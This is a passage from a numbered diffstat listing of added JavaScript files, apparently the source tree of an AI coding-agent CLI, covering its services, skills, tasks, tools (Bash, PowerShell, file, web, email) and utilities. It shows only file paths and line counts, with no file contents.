  1100. package/src/services/compact/timeBasedMCConfig.js +11 -0
  1101. package/src/services/contextCollapse/index.js +33 -0
  1102. package/src/services/contextCollapse/operations.js +5 -0
  1103. package/src/services/contextCollapse/persist.js +5 -0
  1104. package/src/services/diagnosticTracking.js +282 -0
  1105. package/src/services/elevenlabsTTS.js +245 -0
  1106. package/src/services/extractMemories/extractMemories.js +442 -0
  1107. package/src/services/extractMemories/prompts.js +129 -0
  1108. package/src/services/internalLogging.js +68 -0
  1109. package/src/services/lsp/LSPClient.js +306 -0
  1110. package/src/services/lsp/LSPDiagnosticRegistry.js +277 -0
  1111. package/src/services/lsp/LSPServerInstance.js +388 -0
  1112. package/src/services/lsp/LSPServerManager.js +305 -0
  1113. package/src/services/lsp/config.js +57 -0
  1114. package/src/services/lsp/manager.js +246 -0
  1115. package/src/services/lsp/passiveFeedback.js +226 -0
  1116. package/src/services/mcp/InProcessTransport.js +54 -0
  1117. package/src/services/mcp/MCPConnectionManager.js +50 -0
  1118. package/src/services/mcp/SdkControlTransport.js +115 -0
  1119. package/src/services/mcp/auth.js +1882 -0
  1120. package/src/services/mcp/channelAllowlist.js +57 -0
  1121. package/src/services/mcp/channelNotification.js +235 -0
  1122. package/src/services/mcp/channelPermissions.js +192 -0
  1123. package/src/services/mcp/claudeai.js +123 -0
  1124. package/src/services/mcp/client.js +2478 -0
  1125. package/src/services/mcp/config.js +1271 -0
  1126. package/src/services/mcp/elicitationHandler.js +192 -0
  1127. package/src/services/mcp/envExpansion.js +30 -0
  1128. package/src/services/mcp/headersHelper.js +93 -0
  1129. package/src/services/mcp/mcpStringUtils.js +85 -0
  1130. package/src/services/mcp/normalization.js +21 -0
  1131. package/src/services/mcp/oauthPort.js +69 -0
  1132. package/src/services/mcp/officialRegistry.js +20 -0
  1133. package/src/services/mcp/types.js +94 -0
  1134. package/src/services/mcp/useManageMCPConnections.js +818 -0
  1135. package/src/services/mcp/utils.js +433 -0
  1136. package/src/services/mcp/vscodeSdkMcp.js +69 -0
  1137. package/src/services/mcp/xaa.js +342 -0
  1138. package/src/services/mcp/xaaIdpLogin.js +377 -0
  1139. package/src/services/mcpServerApproval.js +30 -0
  1140. package/src/services/mockRateLimits.js +666 -0
  1141. package/src/services/notifier.js +114 -0
  1142. package/src/services/oauth/auth-code-listener.js +165 -0
  1143. package/src/services/oauth/client.js +397 -0
  1144. package/src/services/oauth/crypto.js +19 -0
  1145. package/src/services/oauth/getOauthProfile.js +48 -0
  1146. package/src/services/oauth/index.js +133 -0
  1147. package/src/services/plugins/PluginInstallationManager.js +139 -0
  1148. package/src/services/plugins/pluginCliCommands.js +230 -0
  1149. package/src/services/plugins/pluginOperations.js +826 -0
  1150. package/src/services/policyLimits/index.js +547 -0
  1151. package/src/services/policyLimits/types.js +9 -0
  1152. package/src/services/preventSleep.js +143 -0
  1153. package/src/services/rateLimitMessages.js +271 -0
  1154. package/src/services/rateLimitMocking.js +91 -0
  1155. package/src/services/remoteManagedSettings/index.js +534 -0
  1156. package/src/services/remoteManagedSettings/securityCheck.js +60 -0
  1157. package/src/services/remoteManagedSettings/syncCache.js +90 -0
  1158. package/src/services/remoteManagedSettings/syncCacheState.js +89 -0
  1159. package/src/services/remoteManagedSettings/types.js +12 -0
  1160. package/src/services/sessionTranscript/sessionTranscript.js +5 -0
  1161. package/src/services/settingsSync/index.js +478 -0
  1162. package/src/services/settingsSync/types.js +35 -0
  1163. package/src/services/skillSearch/featureCheck.js +8 -0
  1164. package/src/services/skillSearch/localSearch.js +5 -0
  1165. package/src/services/skillSearch/prefetch.js +8 -0
  1166. package/src/services/skillSearch/remoteSkillLoader.js +8 -0
  1167. package/src/services/skillSearch/remoteSkillState.js +11 -0
  1168. package/src/services/skillSearch/signals.js +3 -0
  1169. package/src/services/skillSearch/telemetry.js +8 -0
  1170. package/src/services/teamMemorySync/index.js +976 -0
  1171. package/src/services/teamMemorySync/secretScanner.js +275 -0
  1172. package/src/services/teamMemorySync/teamMemSecretGuard.js +33 -0
  1173. package/src/services/teamMemorySync/types.js +47 -0
  1174. package/src/services/teamMemorySync/watcher.js +326 -0
  1175. package/src/services/thaddeusAuth.js +485 -0
  1176. package/src/services/thaddeusAuthTypes.js +9 -0
  1177. package/src/services/thaddeusLoginFlow.js +236 -0
  1178. package/src/services/tips/tipHistory.js +17 -0
  1179. package/src/services/tips/tipRegistry.js +593 -0
  1180. package/src/services/tips/tipScheduler.js +40 -0
  1181. package/src/services/tokenEstimation.js +365 -0
  1182. package/src/services/toolUseSummary/toolUseSummaryGenerator.js +87 -0
  1183. package/src/services/tools/StreamingToolExecutor.js +413 -0
  1184. package/src/services/tools/toolExecution.js +1309 -0
  1185. package/src/services/tools/toolHooks.js +454 -0
  1186. package/src/services/tools/toolOrchestration.js +110 -0
  1187. package/src/services/vcr.js +291 -0
  1188. package/src/services/voice.js +392 -0
  1189. package/src/services/voiceKeyterms.js +94 -0
  1190. package/src/services/voiceStreamSTT.js +405 -0
  1191. package/src/setup.js +310 -0
  1192. package/src/skills/bundled/batch.js +114 -0
  1193. package/src/skills/bundled/claudeApi.js +145 -0
  1194. package/src/skills/bundled/claudeApiContent.js +71 -0
  1195. package/src/skills/bundled/claudeInChrome.js +27 -0
  1196. package/src/skills/bundled/debug.js +99 -0
  1197. package/src/skills/bundled/dream.js +49 -0
  1198. package/src/skills/bundled/emailSetup.js +196 -0
  1199. package/src/skills/bundled/hunter.js +28 -0
  1200. package/src/skills/bundled/index.js +80 -0
  1201. package/src/skills/bundled/keybindings.js +292 -0
  1202. package/src/skills/bundled/loop.js +81 -0
  1203. package/src/skills/bundled/loremIpsum.js +264 -0
  1204. package/src/skills/bundled/reactor.js +31 -0
  1205. package/src/skills/bundled/remember.js +73 -0
  1206. package/src/skills/bundled/runSkillGenerator.js +12 -0
  1207. package/src/skills/bundled/scheduleRemoteAgents.js +373 -0
  1208. package/src/skills/bundled/simplify.js +66 -0
  1209. package/src/skills/bundled/skillify.js +182 -0
  1210. package/src/skills/bundled/stuck.js +69 -0
  1211. package/src/skills/bundled/updateConfig.js +463 -0
  1212. package/src/skills/bundled/verify.js +23 -0
  1213. package/src/skills/bundled/verifyContent.js +10 -0
  1214. package/src/skills/bundledSkills.js +159 -0
  1215. package/src/skills/loadSkillsDir.js +736 -0
  1216. package/src/skills/mcpSkillBuilders.js +10 -0
  1217. package/src/skills/mcpSkills.js +5 -0
  1218. package/src/state/AppState.js +182 -0
  1219. package/src/state/AppStateStore.js +117 -0
  1220. package/src/state/onChangeAppState.js +132 -0
  1221. package/src/state/selectors.js +51 -0
  1222. package/src/state/store.js +21 -0
  1223. package/src/state/teammateViewHelpers.js +124 -0
  1224. package/src/stubs/ant-chrome-mcp/index.js +4 -0
  1225. package/src/stubs/ant-computer-use-input/index.js +2 -0
  1226. package/src/stubs/ant-computer-use-mcp/index.js +7 -0
  1227. package/src/stubs/ant-computer-use-mcp/sentinelApps.js +2 -0
  1228. package/src/stubs/ant-computer-use-mcp/types.js +3 -0
  1229. package/src/stubs/ant-computer-use-swift/index.js +1 -0
  1230. package/src/stubs/anthropic-sandbox/index.js +34 -0
  1231. package/src/tasks/DreamTask/DreamTask.js +99 -0
  1232. package/src/tasks/InProcessTeammateTask/InProcessTeammateTask.js +116 -0
  1233. package/src/tasks/InProcessTeammateTask/types.js +35 -0
  1234. package/src/tasks/LocalAgentTask/LocalAgentTask.js +507 -0
  1235. package/src/tasks/LocalMainSessionTask.js +338 -0
  1236. package/src/tasks/LocalShellTask/LocalShellTask.js +475 -0
  1237. package/src/tasks/LocalShellTask/guards.js +9 -0
  1238. package/src/tasks/LocalShellTask/killShellTasks.js +59 -0
  1239. package/src/tasks/LocalWorkflowTask/LocalWorkflowTask.js +7 -0
  1240. package/src/tasks/MonitorMcpTask/MonitorMcpTask.js +20 -0
  1241. package/src/tasks/RemoteAgentTask/RemoteAgentTask.js +742 -0
  1242. package/src/tasks/pillLabel.js +69 -0
  1243. package/src/tasks/stopTask.js +67 -0
  1244. package/src/tasks/types.js +18 -0
  1245. package/src/tasks.js +37 -0
  1246. package/src/tools/AIEmployeesTool/AIEmployeesTool.js +674 -0
  1247. package/src/tools/AIEmployeesTool/constants.js +1 -0
  1248. package/src/tools/AIEmployeesTool/prompt.js +56 -0
  1249. package/src/tools/AgentTool/AgentTool.js +1221 -0
  1250. package/src/tools/AgentTool/UI.js +593 -0
  1251. package/src/tools/AgentTool/agentColorManager.js +43 -0
  1252. package/src/tools/AgentTool/agentDisplay.js +72 -0
  1253. package/src/tools/AgentTool/agentMemory.js +125 -0
  1254. package/src/tools/AgentTool/agentMemorySnapshot.js +136 -0
  1255. package/src/tools/AgentTool/agentToolUtils.js +456 -0
  1256. package/src/tools/AgentTool/built-in/exploreAgent.js +76 -0
  1257. package/src/tools/AgentTool/built-in/generalPurposeAgent.js +28 -0
  1258. package/src/tools/AgentTool/built-in/planAgent.js +87 -0
  1259. package/src/tools/AgentTool/built-in/statuslineSetup.js +140 -0
  1260. package/src/tools/AgentTool/built-in/thaddeusGuideAgent.js +174 -0
  1261. package/src/tools/AgentTool/built-in/verificationAgent.js +146 -0
  1262. package/src/tools/AgentTool/builtInAgents.js +56 -0
  1263. package/src/tools/AgentTool/constants.js +11 -0
  1264. package/src/tools/AgentTool/forkSubagent.js +177 -0
  1265. package/src/tools/AgentTool/loadAgentsDir.js +497 -0
  1266. package/src/tools/AgentTool/prompt.js +260 -0
  1267. package/src/tools/AgentTool/resumeAgent.js +182 -0
  1268. package/src/tools/AgentTool/runAgent.js +627 -0
  1269. package/src/tools/AppointmentsTool/AppointmentsTool.js +628 -0
  1270. package/src/tools/AppointmentsTool/constants.js +1 -0
  1271. package/src/tools/AppointmentsTool/prompt.js +15 -0
  1272. package/src/tools/AskUserQuestionTool/AskUserQuestionTool.js +238 -0
  1273. package/src/tools/AskUserQuestionTool/prompt.js +38 -0
  1274. package/src/tools/BashTool/BashTool.js +1009 -0
  1275. package/src/tools/BashTool/BashToolResultMessage.js +169 -0
  1276. package/src/tools/BashTool/UI.js +134 -0
  1277. package/src/tools/BashTool/bashCommandHelpers.js +184 -0
  1278. package/src/tools/BashTool/bashPermissions.js +2023 -0
  1279. package/src/tools/BashTool/bashSecurity.js +2267 -0
  1280. package/src/tools/BashTool/commandSemantics.js +105 -0
  1281. package/src/tools/BashTool/commentLabel.js +14 -0
  1282. package/src/tools/BashTool/destructiveCommandWarning.js +88 -0
  1283. package/src/tools/BashTool/modeValidation.js +86 -0
  1284. package/src/tools/BashTool/pathValidation.js +1079 -0
  1285. package/src/tools/BashTool/prompt.js +333 -0
  1286. package/src/tools/BashTool/readOnlyValidation.js +1794 -0
  1287. package/src/tools/BashTool/sedEditParser.js +282 -0
  1288. package/src/tools/BashTool/sedValidation.js +580 -0
  1289. package/src/tools/BashTool/shouldUseSandbox.js +125 -0
  1290. package/src/tools/BashTool/toolName.js +2 -0
  1291. package/src/tools/BashTool/utils.js +180 -0
  1292. package/src/tools/BriefTool/BriefTool.js +173 -0
  1293. package/src/tools/BriefTool/UI.js +67 -0
  1294. package/src/tools/BriefTool/attachments.js +86 -0
  1295. package/src/tools/BriefTool/prompt.js +19 -0
  1296. package/src/tools/BriefTool/upload.js +136 -0
  1297. package/src/tools/CalendarTool/CalendarTool.js +498 -0
  1298. package/src/tools/CalendarTool/constants.js +1 -0
  1299. package/src/tools/CalendarTool/prompt.js +11 -0
  1300. package/src/tools/ConfigTool/ConfigTool.js +398 -0
  1301. package/src/tools/ConfigTool/UI.js +25 -0
  1302. package/src/tools/ConfigTool/constants.js +1 -0
  1303. package/src/tools/ConfigTool/prompt.js +82 -0
  1304. package/src/tools/ConfigTool/supportedSettings.js +180 -0
  1305. package/src/tools/ContactsTool/ContactsTool.js +648 -0
  1306. package/src/tools/ContactsTool/constants.js +1 -0
  1307. package/src/tools/ContactsTool/prompt.js +15 -0
  1308. package/src/tools/CtxInspectTool/CtxInspectTool.js +44 -0
  1309. package/src/tools/DiscoverSkillsTool/prompt.js +4 -0
  1310. package/src/tools/EmailReadTool/index.js +410 -0
  1311. package/src/tools/EmailSendTool/index.js +178 -0
  1312. package/src/tools/EnterPlanModeTool/EnterPlanModeTool.js +98 -0
  1313. package/src/tools/EnterPlanModeTool/UI.js +14 -0
  1314. package/src/tools/EnterPlanModeTool/constants.js +1 -0
  1315. package/src/tools/EnterPlanModeTool/prompt.js +164 -0
  1316. package/src/tools/EnterWorktreeTool/EnterWorktreeTool.js +104 -0
  1317. package/src/tools/EnterWorktreeTool/UI.js +9 -0
  1318. package/src/tools/EnterWorktreeTool/constants.js +1 -0
  1319. package/src/tools/EnterWorktreeTool/prompt.js +30 -0
  1320. package/src/tools/ExitPlanModeTool/ExitPlanModeV2Tool.js +383 -0
  1321. package/src/tools/ExitPlanModeTool/UI.js +32 -0
  1322. package/src/tools/ExitPlanModeTool/constants.js +2 -0
  1323. package/src/tools/ExitPlanModeTool/prompt.js +27 -0
  1324. package/src/tools/ExitWorktreeTool/ExitWorktreeTool.js +257 -0
  1325. package/src/tools/ExitWorktreeTool/UI.js +10 -0
  1326. package/src/tools/ExitWorktreeTool/constants.js +1 -0
  1327. package/src/tools/ExitWorktreeTool/prompt.js +32 -0
  1328. package/src/tools/FileEditTool/FileEditTool.js +480 -0
  1329. package/src/tools/FileEditTool/UI.js +202 -0
  1330. package/src/tools/FileEditTool/constants.js +7 -0
  1331. package/src/tools/FileEditTool/prompt.js +24 -0
  1332. package/src/tools/FileEditTool/types.js +50 -0
  1333. package/src/tools/FileEditTool/utils.js +579 -0
  1334. package/src/tools/FileReadTool/FileReadTool.js +889 -0
  1335. package/src/tools/FileReadTool/UI.js +126 -0
  1336. package/src/tools/FileReadTool/imageProcessor.js +46 -0
  1337. package/src/tools/FileReadTool/limits.js +70 -0
  1338. package/src/tools/FileReadTool/prompt.js +31 -0
  1339. package/src/tools/FileWriteTool/FileWriteTool.js +341 -0
  1340. package/src/tools/FileWriteTool/UI.js +339 -0
  1341. package/src/tools/FileWriteTool/prompt.js +15 -0
  1342. package/src/tools/GlobTool/GlobTool.js +161 -0
  1343. package/src/tools/GlobTool/UI.js +40 -0
  1344. package/src/tools/GlobTool/prompt.js +6 -0
  1345. package/src/tools/GrepTool/GrepTool.js +439 -0
  1346. package/src/tools/GrepTool/UI.js +155 -0
  1347. package/src/tools/GrepTool/prompt.js +16 -0
  1348. package/src/tools/IntegrationsTool/IntegrationsTool.js +217 -0
  1349. package/src/tools/IntegrationsTool/constants.js +1 -0
  1350. package/src/tools/IntegrationsTool/prompt.js +41 -0
  1351. package/src/tools/InteractionsTool/InteractionsTool.js +525 -0
  1352. package/src/tools/InteractionsTool/constants.js +1 -0
  1353. package/src/tools/InteractionsTool/prompt.js +14 -0
  1354. package/src/tools/InvoicesTool/InvoicesTool.js +581 -0
  1355. package/src/tools/InvoicesTool/constants.js +1 -0
  1356. package/src/tools/InvoicesTool/prompt.js +15 -0
  1357. package/src/tools/LSPTool/LSPTool.js +660 -0
  1358. package/src/tools/LSPTool/UI.js +205 -0
  1359. package/src/tools/LSPTool/formatters.js +445 -0
  1360. package/src/tools/LSPTool/prompt.js +20 -0
  1361. package/src/tools/LSPTool/schemas.js +197 -0
  1362. package/src/tools/LSPTool/symbolContext.js +75 -0
  1363. package/src/tools/LeadScorerTool/LeadScorerTool.js +509 -0
  1364. package/src/tools/LeadScorerTool/constants.js +1 -0
  1365. package/src/tools/LeadScorerTool/prompt.js +11 -0
  1366. package/src/tools/ListMcpResourcesTool/ListMcpResourcesTool.js +100 -0
  1367. package/src/tools/ListMcpResourcesTool/UI.js +17 -0
  1368. package/src/tools/ListMcpResourcesTool/prompt.js +18 -0
  1369. package/src/tools/ListPeersTool/ListPeersTool.js +45 -0
  1370. package/src/tools/MCPTool/MCPTool.js +60 -0
  1371. package/src/tools/MCPTool/UI.js +343 -0
  1372. package/src/tools/MCPTool/classifyForCollapse.js +597 -0
  1373. package/src/tools/MCPTool/prompt.js +3 -0
  1374. package/src/tools/McpAuthTool/McpAuthTool.js +162 -0
  1375. package/src/tools/MonitorTool/MonitorTool.js +55 -0
  1376. package/src/tools/NotebookEditTool/NotebookEditTool.js +421 -0
  1377. package/src/tools/NotebookEditTool/UI.js +41 -0
  1378. package/src/tools/NotebookEditTool/constants.js +2 -0
  1379. package/src/tools/NotebookEditTool/prompt.js +2 -0
  1380. package/src/tools/OverflowTestTool/OverflowTestTool.js +51 -0
  1381. package/src/tools/PhoneBridgeTool/PhoneBridgeTool.js +301 -0
  1382. package/src/tools/PhoneBridgeTool/constants.js +1 -0
  1383. package/src/tools/PhoneBridgeTool/prompt.js +26 -0
  1384. package/src/tools/PowerShellTool/PowerShellTool.js +900 -0
  1385. package/src/tools/PowerShellTool/UI.js +58 -0
  1386. package/src/tools/PowerShellTool/clmTypes.js +207 -0
  1387. package/src/tools/PowerShellTool/commandSemantics.js +115 -0
  1388. package/src/tools/PowerShellTool/commonParameters.js +27 -0
  1389. package/src/tools/PowerShellTool/destructiveCommandWarning.js +92 -0
  1390. package/src/tools/PowerShellTool/gitSafety.js +185 -0
  1391. package/src/tools/PowerShellTool/modeValidation.js +357 -0
  1392. package/src/tools/PowerShellTool/pathValidation.js +1712 -0
  1393. package/src/tools/PowerShellTool/powershellPermissions.js +1351 -0
  1394. package/src/tools/PowerShellTool/powershellSecurity.js +942 -0
  1395. package/src/tools/PowerShellTool/prompt.js +132 -0
  1396. package/src/tools/PowerShellTool/readOnlyValidation.js +1633 -0
  1397. package/src/tools/PowerShellTool/toolName.js +2 -0
  1398. package/src/tools/PushNotificationTool/PushNotificationTool.js +35 -0
  1399. package/src/tools/REPLTool/REPLTool.js +44 -0
  1400. package/src/tools/REPLTool/constants.js +43 -0
  1401. package/src/tools/REPLTool/primitiveTools.js +36 -0
  1402. package/src/tools/ReadMcpResourceTool/ReadMcpResourceTool.js +112 -0
  1403. package/src/tools/ReadMcpResourceTool/UI.js +24 -0
  1404. package/src/tools/ReadMcpResourceTool/prompt.js +15 -0
  1405. package/src/tools/RemoteTriggerTool/RemoteTriggerTool.js +142 -0
  1406. package/src/tools/RemoteTriggerTool/UI.js +12 -0
  1407. package/src/tools/RemoteTriggerTool/prompt.js +12 -0
  1408. package/src/tools/ReviewArtifactTool/ReviewArtifactTool.js +51 -0
  1409. package/src/tools/ScheduleCronTool/CronCreateTool.js +120 -0
  1410. package/src/tools/ScheduleCronTool/CronDeleteTool.js +74 -0
  1411. package/src/tools/ScheduleCronTool/CronListTool.js +77 -0
  1412. package/src/tools/ScheduleCronTool/UI.js +29 -0
  1413. package/src/tools/ScheduleCronTool/prompt.js +115 -0
  1414. package/src/tools/SendMessageTool/SendMessageTool.js +673 -0
  1415. package/src/tools/SendMessageTool/UI.js +24 -0
  1416. package/src/tools/SendMessageTool/constants.js +1 -0
  1417. package/src/tools/SendMessageTool/prompt.js +47 -0
  1418. package/src/tools/SendUserFileTool/SendUserFileTool.js +35 -0
  1419. package/src/tools/SendUserFileTool/prompt.js +5 -0
  1420. package/src/tools/SkillTool/SkillTool.js +825 -0
  1421. package/src/tools/SkillTool/UI.js +61 -0
  1422. package/src/tools/SkillTool/constants.js +1 -0
  1423. package/src/tools/SkillTool/prompt.js +184 -0
  1424. package/src/tools/SleepTool/SleepTool.js +42 -0
  1425. package/src/tools/SleepTool/prompt.js +14 -0
  1426. package/src/tools/SnipTool/SnipTool.js +47 -0
  1427. package/src/tools/SnipTool/prompt.js +5 -0
  1428. package/src/tools/SubscribePRTool/SubscribePRTool.js +49 -0
  1429. package/src/tools/SuggestBackgroundPRTool/SuggestBackgroundPRTool.js +44 -0
  1430. package/src/tools/SyntheticOutputTool/SyntheticOutputTool.js +138 -0
  1431. package/src/tools/SyntheticOutputTool/SyntheticOutputTool.ts +1 -1
  1432. package/src/tools/TaskCreateTool/TaskCreateTool.js +104 -0
  1433. package/src/tools/TaskCreateTool/constants.js +1 -0
  1434. package/src/tools/TaskCreateTool/prompt.js +52 -0
  1435. package/src/tools/TaskGetTool/TaskGetTool.js +106 -0
  1436. package/src/tools/TaskGetTool/constants.js +1 -0
  1437. package/src/tools/TaskGetTool/prompt.js +23 -0
  1438. package/src/tools/TaskListTool/TaskListTool.js +89 -0
  1439. package/src/tools/TaskListTool/constants.js +1 -0
  1440. package/src/tools/TaskListTool/prompt.js +44 -0
  1441. package/src/tools/TaskOutputTool/TaskOutputTool.js +536 -0
  1442. package/src/tools/TaskOutputTool/constants.js +1 -0
  1443. package/src/tools/TaskStopTool/TaskStopTool.js +110 -0
  1444. package/src/tools/TaskStopTool/UI.js +31 -0
  1445. package/src/tools/TaskStopTool/prompt.js +7 -0
  1446. package/src/tools/TaskUpdateTool/TaskUpdateTool.js +301 -0
  1447. package/src/tools/TaskUpdateTool/constants.js +1 -0
  1448. package/src/tools/TaskUpdateTool/prompt.js +76 -0
  1449. package/src/tools/TeamCreateTool/TeamCreateTool.js +177 -0
  1450. package/src/tools/TeamCreateTool/UI.js +4 -0
  1451. package/src/tools/TeamCreateTool/constants.js +1 -0
  1452. package/src/tools/TeamCreateTool/prompt.js +113 -0
  1453. package/src/tools/TeamDeleteTool/TeamDeleteTool.js +102 -0
  1454. package/src/tools/TeamDeleteTool/UI.js +13 -0
  1455. package/src/tools/TeamDeleteTool/constants.js +1 -0
  1456. package/src/tools/TeamDeleteTool/prompt.js +16 -0
  1457. package/src/tools/TerminalCaptureTool/TerminalCaptureTool.js +47 -0
  1458. package/src/tools/TerminalCaptureTool/prompt.js +11 -0
  1459. package/src/tools/TodoWriteTool/TodoWriteTool.js +99 -0
  1460. package/src/tools/TodoWriteTool/constants.js +1 -0
  1461. package/src/tools/TodoWriteTool/prompt.js +181 -0
  1462. package/src/tools/ToolSearchTool/ToolSearchTool.js +357 -0
  1463. package/src/tools/ToolSearchTool/constants.js +1 -0
  1464. package/src/tools/ToolSearchTool/prompt.js +97 -0
  1465. package/src/tools/TungstenTool/TungstenLiveMonitor.js +7 -0
  1466. package/src/tools/TungstenTool/TungstenTool.js +3 -0
  1467. package/src/tools/VerifyPlanExecutionTool/VerifyPlanExecutionTool.js +45 -0
  1468. package/src/tools/VerifyPlanExecutionTool/constants.js +2 -0
  1469. package/src/tools/WebBrowserTool/WebBrowserPanel.js +5 -0
  1470. package/src/tools/WebBrowserTool/WebBrowserTool.js +58 -0
  1471. package/src/tools/WebFetchTool/UI.js +31 -0
  1472. package/src/tools/WebFetchTool/WebFetchTool.js +246 -0
  1473. package/src/tools/WebFetchTool/preapproved.js +154 -0
  1474. package/src/tools/WebFetchTool/prompt.js +39 -0
  1475. package/src/tools/WebFetchTool/utils.js +368 -0
  1476. package/src/tools/WebSearchTool/UI.js +67 -0
  1477. package/src/tools/WebSearchTool/WebSearchTool.js +396 -0
  1478. package/src/tools/WebSearchTool/prompt.js +32 -0
  1479. package/src/tools/WorkflowTool/WorkflowPermissionRequest.js +7 -0
  1480. package/src/tools/WorkflowTool/WorkflowTool.js +51 -0
  1481. package/src/tools/WorkflowTool/bundled/index.js +5 -0
  1482. package/src/tools/WorkflowTool/constants.js +1 -0
  1483. package/src/tools/WorkflowTool/createWorkflowCommand.js +5 -0
  1484. package/src/tools/shared/gitOperationTracking.js +220 -0
  1485. package/src/tools/shared/spawnMultiAgent.js +805 -0
  1486. package/src/tools/testing/TestingPermissionTool.js +72 -0
  1487. package/src/tools/utils.js +24 -0
  1488. package/src/tools.js +365 -0
  1489. package/src/types/command.js +8 -0
  1490. package/src/types/connectorText.js +3 -0
  1491. package/src/types/generated/events_mono/claude_code/v1/claude_code_internal_event.js +673 -0
  1492. package/src/types/generated/events_mono/common/v1/auth.js +49 -0
  1493. package/src/types/generated/events_mono/growthbook/v1/growthbook_experiment_event.js +147 -0
  1494. package/src/types/generated/google/protobuf/timestamp.js +38 -0
  1495. package/src/types/hooks.js +153 -0
  1496. package/src/types/ids.js +27 -0
  1497. package/src/types/logs.js +11 -0
  1498. package/src/types/permissions.js +25 -0
  1499. package/src/types/plugin.js +72 -0
  1500. package/src/types/textInputTypes.js +20 -0
  1501. package/src/upstreamproxy/relay.js +346 -0
  1502. package/src/upstreamproxy/upstreamproxy.js +234 -0
  1503. package/src/utils/CircularBuffer.js +75 -0
  1504. package/src/utils/Cursor.js +1229 -0
  1505. package/src/utils/QueryGuard.js +115 -0
  1506. package/src/utils/Shell.js +374 -0
  1507. package/src/utils/ShellCommand.js +336 -0
  1508. package/src/utils/abortController.js +74 -0
  1509. package/src/utils/activityManager.js +127 -0
  1510. package/src/utils/advisor.js +77 -0
  1511. package/src/utils/agentContext.js +91 -0
  1512. package/src/utils/agentId.js +83 -0
  1513. package/src/utils/agentSwarmsEnabled.js +37 -0
  1514. package/src/utils/agenticSessionSearch.js +255 -0
  1515. package/src/utils/analyzeContext.js +846 -0
  1516. package/src/utils/ansiToPng.js +259 -0
  1517. package/src/utils/ansiToSvg.js +207 -0
  1518. package/src/utils/api.js +555 -0
  1519. package/src/utils/apiPreconnect.js +62 -0
  1520. package/src/utils/appleTerminalBackup.js +95 -0
  1521. package/src/utils/argumentSubstitution.js +114 -0
  1522. package/src/utils/array.js +12 -0
  1523. package/src/utils/asciicast.js +200 -0
  1524. package/src/utils/attachments.js +2518 -0
  1525. package/src/utils/attribution.js +308 -0
  1526. package/src/utils/auth.js +1598 -0
  1527. package/src/utils/authFileDescriptor.js +152 -0
  1528. package/src/utils/authPortable.js +14 -0
  1529. package/src/utils/autoModeDenials.js +15 -0
  1530. package/src/utils/autoRunIssue.js +113 -0
  1531. package/src/utils/autoUpdater.js +457 -0
  1532. package/src/utils/aws.js +44 -0
  1533. package/src/utils/awsAuthStatusManager.js +66 -0
  1534. package/src/utils/background/remote/preconditions.js +175 -0
  1535. package/src/utils/background/remote/remoteSession.js +53 -0
  1536. package/src/utils/backgroundHousekeeping.js +64 -0
  1537. package/src/utils/bash/ParsedCommand.js +241 -0
  1538. package/src/utils/bash/ShellSnapshot.js +489 -0
  1539. package/src/utils/bash/ast.js +2590 -0
  1540. package/src/utils/bash/bashParser.js +4355 -0
  1541. package/src/utils/bash/bashPipeCommand.js +249 -0
  1542. package/src/utils/bash/commands.js +1131 -0
  1543. package/src/utils/bash/heredoc.js +647 -0
  1544. package/src/utils/bash/parser.js +195 -0
  1545. package/src/utils/bash/prefix.js +154 -0
  1546. package/src/utils/bash/registry.js +23 -0
  1547. package/src/utils/bash/shellCompletion.js +196 -0
  1548. package/src/utils/bash/shellPrefix.js +25 -0
  1549. package/src/utils/bash/shellQuote.js +253 -0
  1550. package/src/utils/bash/shellQuoting.js +106 -0
  1551. package/src/utils/bash/specs/alias.js +11 -0
  1552. package/src/utils/bash/specs/index.js +16 -0
  1553. package/src/utils/bash/specs/nohup.js +10 -0
  1554. package/src/utils/bash/specs/pyright.js +88 -0
  1555. package/src/utils/bash/specs/sleep.js +10 -0
  1556. package/src/utils/bash/specs/srun.js +28 -0
  1557. package/src/utils/bash/specs/time.js +10 -0
  1558. package/src/utils/bash/specs/timeout.js +17 -0
  1559. package/src/utils/bash/treeSitterAnalysis.js +407 -0
  1560. package/src/utils/betas.js +331 -0
  1561. package/src/utils/billing.js +54 -0
  1562. package/src/utils/binaryCheck.js +40 -0
  1563. package/src/utils/browser.js +58 -0
  1564. package/src/utils/bufferedWriter.js +77 -0
  1565. package/src/utils/bundledMode.js +19 -0
  1566. package/src/utils/businessDb.js +390 -0
  1567. package/src/utils/caCerts.js +91 -0
  1568. package/src/utils/caCertsConfig.js +77 -0
  1569. package/src/utils/cachePaths.js +28 -0
  1570. package/src/utils/classifierApprovals.js +66 -0
  1571. package/src/utils/classifierApprovalsHook.js +10 -0
  1572. package/src/utils/claudeDesktop.js +108 -0
  1573. package/src/utils/claudeInChrome/chromeNativeHost.js +416 -0
  1574. package/src/utils/claudeInChrome/common.js +466 -0
  1575. package/src/utils/claudeInChrome/mcpServer.js +237 -0
  1576. package/src/utils/claudeInChrome/prompt.js +79 -0
  1577. package/src/utils/claudeInChrome/setup.js +304 -0
  1578. package/src/utils/claudeInChrome/setupPortable.js +172 -0
  1579. package/src/utils/claudeInChrome/toolRendering.js +235 -0
  1580. package/src/utils/claudemd.js +1052 -0
  1581. package/src/utils/cleanup.js +514 -0
  1582. package/src/utils/cleanupRegistry.js +22 -0
  1583. package/src/utils/cliArgs.js +53 -0
  1584. package/src/utils/cliHighlight.js +45 -0
  1585. package/src/utils/codeIndexing.js +149 -0
  1586. package/src/utils/collapseBackgroundBashNotifications.js +70 -0
  1587. package/src/utils/collapseHookSummaries.js +48 -0
  1588. package/src/utils/collapseReadSearch.js +869 -0
  1589. package/src/utils/collapseTeammateShutdowns.js +44 -0
  1590. package/src/utils/combinedAbortSignal.js +40 -0
  1591. package/src/utils/commandLifecycle.js +7 -0
  1592. package/src/utils/commitAttribution.js +718 -0
  1593. package/src/utils/completionCache.js +138 -0
  1594. package/src/utils/computerUse/appNames.js +170 -0
  1595. package/src/utils/computerUse/cleanup.js +65 -0
  1596. package/src/utils/computerUse/common.js +56 -0
  1597. package/src/utils/computerUse/computerUseLock.js +183 -0
  1598. package/src/utils/computerUse/drainRunLoop.js +71 -0
  1599. package/src/utils/computerUse/escHotkey.js +53 -0
  1600. package/src/utils/computerUse/executor.js +480 -0
  1601. package/src/utils/computerUse/gates.js +55 -0
  1602. package/src/utils/computerUse/hostAdapter.js +62 -0
  1603. package/src/utils/computerUse/inputLoader.js +25 -0
  1604. package/src/utils/computerUse/mcpServer.js +84 -0
  1605. package/src/utils/computerUse/setup.js +42 -0
  1606. package/src/utils/computerUse/swiftLoader.js +18 -0
  1607. package/src/utils/computerUse/toolRendering.js +101 -0
  1608. package/src/utils/computerUse/wrapper.js +317 -0
